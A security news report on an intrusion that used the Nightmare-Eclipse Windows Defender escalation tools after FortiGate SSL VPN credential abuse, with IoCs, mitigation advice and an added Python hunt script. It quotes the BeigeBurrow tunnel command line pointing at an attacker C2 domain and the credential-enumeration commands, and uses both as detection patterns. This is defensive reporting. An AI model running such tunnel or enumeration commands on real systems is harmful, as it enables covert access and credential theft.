
Hackers Use Nightmare-Eclipse Tools After Compromising FortiGate SSL VPN Access

A real-world intrusion campaign has been identified that leveraged the publicly available Nightmare-Eclipse privilege escalation tools BlueHammer, RedSun, and UnDefend, following what appears to be unauthorized access through a compromised FortiGate SSL VPN.

The incident marks the first confirmed in-the-wild deployment of these tools against a live enterprise environment, raising urgent alarms for security teams globally.

The tools at the center of this incident were developed by a security researcher known as Chaotic Eclipse, also referred to as Nightmare-Eclipse, a pseudonymous figure who grew frustrated with Microsoft’s vulnerability disclosure process and publicly released a series of local privilege escalation (LPE) exploits in retaliation.

The three tools, BlueHammer, RedSun, and UnDefend, exploit logic flaws in Windows Defender’s privileged operations to escalate an attacker from an unprivileged user account to SYSTEM-level access, or to disrupt Defender’s security functions entirely, all without requiring administrative rights.

Microsoft addressed BlueHammer in its April 2026 Patch Tuesday update, tracking it as CVE-2026-33825. However, as of publication, RedSun and UnDefend remain unpatched zero-days actively usable against fully updated Windows systems.

Nightmare-Eclipse Tools Using FortiGate SSL VPN Access

Huntress first detected suspected in-the-wild use of BlueHammer on April 10, 2026, when a binary named FunnyApp.exe, a build pulled directly from the public BlueHammer GitHub repository, was executed from a victim user’s Pictures folder and subsequently quarantined by Defender as Exploit:Win32/DfndrPEBluHmr.BZ.

Activity escalated on April 16, with investigators observing an execution of RedSun.exe from the user’s Downloads directory, alongside multiple executions of undef.exe, the UnDefend binary, from short two-letter subfolders such as ks and kk.

In a telling sign of operator inexperience, the threat actor invoked UnDefend with a misspelled -agressive flag and a -h help flag that does nothing in the tool, demonstrating they had not fully read or understood the tooling.

Critically, none of the privilege escalation attempts succeeded: BlueHammer did not extract SAM credentials, RedSun did not overwrite TieringEngineService.exe in System32, and UnDefend was terminated by Huntress’ SOC during active remediation.

Customer-provided VPN logs revealed a critical piece of the puzzle. On April 15, 2026, at 13:44 UTC, an attacker initiated an SSL VPN connection to the victim’s FortiGate firewall using valid user credentials from IP 78.29.48[.]29, geolocated to Russia.

Subsequent unauthorized sessions tied to the same account were observed from 212.232.23[.]69 (Singapore) and 179.43.140[.]214 (Switzerland), a multi-geography access pattern consistent with credential abuse and possible credential resale or sharing.

The most operationally dangerous component Huntress identified was a Go-compiled Windows binary dubbed BeigeBurrow, executing as agent.exe -server staybud.dpdns[.]org:443 -hide.

The tool uses HashiCorp’s Yamux multiplexing library to establish a persistent, covert TCP relay between the compromised host and attacker-controlled infrastructure over port 443, a port rarely blocked by enterprise firewalls.

Unlike the privilege escalation tools, BeigeBurrow successfully connected outbound and is the only component in the observed toolkit that achieved its intended purpose. Huntress noted it has observed BeigeBurrow in at least one other unrelated intrusion, though attribution remains unclear.

Beyond tool execution, Huntress confirmed the presence of a live, hands-on-keyboard threat actor through post-exploitation enumeration commands, including whoami /priv, cmdkey /list, and net group.

Notably, whoami /priv was spawned directly from an M365Copilot.exe process, an anomaly that investigators could not fully explain but noted occurred after the initial compromise and following BlueHammer’s first execution attempt.

Indicators of Compromise (IoCs)

Indicator                                   Type            Description
------------------------------------------  --------------  ------------------------------
78.29.48[.]29                               IP              SSL VPN source, Russia
212.232.23[.]69                             IP              SSL VPN source, Singapore
179.43.140[.]214                            IP              SSL VPN source, Switzerland
staybud.dpdns[.]org                         Domain          BeigeBurrow C2 server
FunnyApp.exe, RedSun.exe, undef.exe, z.exe  File            Nightmare-Eclipse binaries
Exploit:Win32/DfndrPEBluHmr.BZ              Defender Alert  BlueHammer detection signature
a2b6c7a9...e2876b7c                         SHA-256         BeigeBurrow agent.exe hash

Mitigation Guidance

Organizations should treat any confirmed execution of these binaries as high-priority incident activity. Huntress recommends the following immediate actions:

  • Patch immediately: Apply Microsoft’s April 2026 Patch Tuesday update to remediate CVE-2026-33825 (BlueHammer).
  • Hunt for staging artifacts: Investigate user-writable paths such as Pictures and short subfolders under Downloads for binaries like FunnyApp.exe, RedSun.exe, undef.exe, and z.exe.
  • Review VPN authentication logs: Flag any account authenticating from multiple countries within a short timeframe.
  • Block and monitor tunneling behavior: Investigate any execution of agent.exe with -server and -hide flags, and block the domain staybud.dpdns[.]org.
  • Detect post-exploitation enumeration: Alert on whoami /priv, cmdkey /list, and net group spawned from unusual parent processes.
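The VPN log review and the process-level checks described in the incident narrative and in the last four bullets above, as an added example that is not Huntress’ code or any part of the Nightmare-Eclipse tooling: a small Python hunt script that runs over constructed SSL VPN login records and constructed process-creation events. The record layouts, the sample records, and the allowlist of expected parent processes are assumptions made for the example; the source IPs, binary names, and C2 domain are the IoCs listed in the article.

```python
"""Hunt helpers that mirror the article's Mitigation Guidance.

Added example; this is not Huntress' or Nightmare-Eclipse's code. Record
layouts and every sample record below are constructed for illustration.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed SSL VPN login records: (timestamp UTC, user, source IP, country).
# The country column stands in for a GeoIP lookup on the source address;
# the first three source IPs are the article's IoCs.
VPN_LOGINS = [
    ("2026-04-15 13:44:00", "jdoe", "78.29.48.29", "RU"),
    ("2026-04-15 15:10:00", "jdoe", "212.232.23.69", "SG"),
    ("2026-04-16 09:02:00", "jdoe", "179.43.140.214", "CH"),
    ("2026-04-15 08:30:00", "asmith", "203.0.113.7", "US"),
    ("2026-04-16 08:31:00", "asmith", "203.0.113.7", "US"),
]


def multi_geo_accounts(logins, window_hours=48):
    """Return {user: sorted country list} for every account that authenticated
    from more than one country inside any span of `window_hours` hours."""
    window = timedelta(hours=window_hours)
    by_user = defaultdict(list)
    for ts, user, _ip, country in logins:
        by_user[user].append((datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), country))
    flagged = {}
    for user, events in by_user.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            countries = {c for t, c in events[i:] if t - start <= window}
            if len(countries) > 1:
                flagged[user] = sorted(countries)
                break
    return flagged


# Enumeration commands named in the article; matched after whitespace normalisation.
ENUM_COMMANDS = ("whoami /priv", "cmdkey /list", "net group")
# Parents from which an operator typing these is expected (constructed allowlist; tune it).
EXPECTED_PARENTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "windowsterminal.exe"}
# Binary names and C2 domain from the article's IoC table (domain refanged for matching).
STAGED_BINARIES = {"funnyapp.exe", "redsun.exe", "undef.exe", "z.exe"}
C2_DOMAIN = "staybud.dpdns[.]org".replace("[.]", ".")

# Constructed process-creation events: (parent image, image, command line).
PROCESS_EVENTS = [
    ("M365Copilot.exe", "whoami.exe", "whoami  /priv"),
    ("cmd.exe", "whoami.exe", "whoami /priv"),
    ("explorer.exe", "agent.exe", r"C:\Users\v\Downloads\agent.exe -server staybud.dpdns.org:443 -hide"),
    ("explorer.exe", "undef.exe", r"C:\Users\v\Downloads\ks\undef.exe -agressive -h"),
    ("svchost.exe", "cmdkey.exe", "cmdkey /list"),
]


def triage_process_events(events):
    """Return (finding, parent, command line) tuples for events matching the
    'tunneling behavior', 'staging artifacts' and 'enumeration' bullets."""
    findings = []
    for parent, image, cmdline in events:
        norm = " ".join(cmdline.lower().split())
        # Enumeration commands are only interesting when the parent is not an expected shell.
        if any(cmd in norm for cmd in ENUM_COMMANDS) and parent.lower() not in EXPECTED_PARENTS:
            findings.append(("enum_unusual_parent", parent, cmdline))
        # BeigeBurrow's observed command line carried -server and -hide and pointed at the C2 domain.
        if ("-server" in norm and "-hide" in norm) or C2_DOMAIN in norm:
            findings.append(("tunnel_agent", parent, cmdline))
        # Any execution of the published Nightmare-Eclipse binaries is high priority on its own.
        if image.lower() in STAGED_BINARIES:
            findings.append(("nightmare_eclipse_binary", parent, cmdline))
    return findings


if __name__ == "__main__":
    for user, countries in multi_geo_accounts(VPN_LOGINS).items():
        print(f"VPN: {user} seen from {', '.join(countries)}")
    for kind, parent, cmdline in triage_process_events(PROCESS_EVENTS):
        print(f"EDR: {kind} parent={parent} cmd={cmdline}")
```

The VPN check uses a sliding window per account rather than a flat "more than one country ever" test, so a user who travels between two countries a month apart is not flagged while the pattern seen here (three countries within a day) is. The parent-process allowlist is deliberately short; whoami /priv from M365Copilot.exe or cmdkey /list from svchost.exe would both surface, matching the anomaly the investigators noted.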

A YARA detection rule for BeigeBurrow has been published publicly to aid community-wide detection efforts.


The post Hackers Use Nightmare-Eclipse Tools After Compromising FortiGate SSL VPN Access appeared first on Cyber Security News.
